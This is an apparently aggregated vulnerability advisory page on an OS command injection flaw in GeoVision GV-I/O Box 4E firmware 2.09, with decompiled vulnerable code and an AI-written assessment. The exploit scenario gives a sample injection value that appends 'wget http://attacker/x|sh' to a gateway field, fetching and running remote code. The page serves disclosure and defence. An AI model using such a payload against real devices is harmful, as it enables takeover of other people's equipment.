Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Network-reachable management endpoints (AV:N, AC:L), administrative auth required to invoke gateway config (PR:H), system() shell breakout escapes the service context (S:C) with full C/I/A impact.
Primary rating from Vendor (GV).
CVSS VectorVendor: GV
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.
libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)
CNetSetObj::m_F_n_Set_Gate_way command injection
The following function takes a string as a gatewy address, performs no sanitization on it and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.
int __fastcall CNetSetObj::m_F_n_Set_Gate_way(const char **this, char *gw, char *dev)
{
char s[324]; // [sp+4h] [bp-144h] BYREF
if ( !dev && !*this || !gw )
return 0;
system("/sbin/route del -net 224.0.0.0 netmask 224.0.0.0");
system("/sbin/route del default ");
if ( dev )
sprintf(s, "/sbin/route add default gw %s dev %s", gw, dev); //attacker controlled gw string
else
sprintf(s, "/sbin/route add default gw %s dev %s", gw, *this); //attacker controlled gw string
system(s);
sprintf(s, "/sbin/route add -net 224.0.0.0 netmask 224.0.0.0 gw %s dev %s", gw, *this); //attacker controlled gw string
system(s);
return 1;
}
AnalysisAI
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows authenticated remote attackers to execute arbitrary shell commands via unsanitized gateway address input passed to system() inside libNetSetObj.so. The flaw is reachable through both the network-exposed DVRSearch service and the Network.cgi endpoint, granting full device compromise. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to reach the GV-I/O Box 4E management plane - specifically the DVRSearch network service or the Network.cgi HTTP endpoint - and to invoke the gateway-setting routine in CNetSetObj::m_F_n_Set_Gate_way with a crafted gw parameter containing shell metacharacters. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The 9.1 Critical CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H reflects network-reachable, low-complexity exploitation with scope change once code runs as the system() child, but PR:H tempers the practical risk because an attacker must already hold privileged access to the device's management interface. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with administrative credentials, or a foothold on the LAN where the GV-I/O Box 4E exposes Network.cgi and DVRSearch, submits a gateway value such as 1.1.1.1;wget http://attacker/x|sh when invoking the network configuration routine. The unsanitized string is passed through sprintf into system() inside libNetSetObj.so, executing the appended shell command as the device process and yielding code execution on the appliance. |
| Remediation | Patch availability is not confirmed in the supplied data, so treat this as no vendor-released patch identified at time of analysis pending direct confirmation from https://www.geovision.com.tw/cyber_security.php and the Talos report at https://talosintelligence.com/vulnerability_reports/TALOS-2026-2379. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all GeoVision GV-I/O Box 4E devices running firmware 2.09 and document network connectivity. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Gv I O Box 4E
View allStack-based buffer overflow in GeoVision GV-I/O Box 4E embedded I/O controllers allows unauthenticated network attackers
Remote unauthenticated stack-based buffer overflow in GeoVision GV-I/O Box 4E smart I/O appliances allows any host on th
Stack-based buffer overflow in the GeoVision GV-I/O Box 4E DVRSearch service allows unauthenticated network attackers to
Stack-based buffer overflow in GeoVision GV-I/O Box 4E allows unauthenticated remote attackers to overflow a fixed-size
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows remote attackers with high privileges to execute ar
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute ar
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers who can reach the device's network servic
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38652
GHSA-4rcp-78rq-p2c3